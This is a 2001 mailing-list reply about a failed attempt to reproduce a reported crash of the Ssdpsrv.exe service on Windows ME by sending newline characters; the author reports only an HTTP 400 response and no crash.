Re: Ssdpsrv.exe in WindowsME

From: ~ (resoat_private)
Date: Sat Oct 20 2001 - 03:02:10 PDT

    One of my PCs runs Windows ME so I tried to replicate the crash but to no
    avail.
    I can send 3 newline commands then I get the "HTTP/1.1 400 Bad Request" but
    Ssdpsrv.exe does not crash.
    I know Microsoft aren't always that great at security but making a program
    that crashes after 3 new line commands seems a little silly even for them
    :-)
    The ME install was a custom install and the service was running so I think
    there's a definite link there.

    Rob Mears
    http://www.securitywriters.org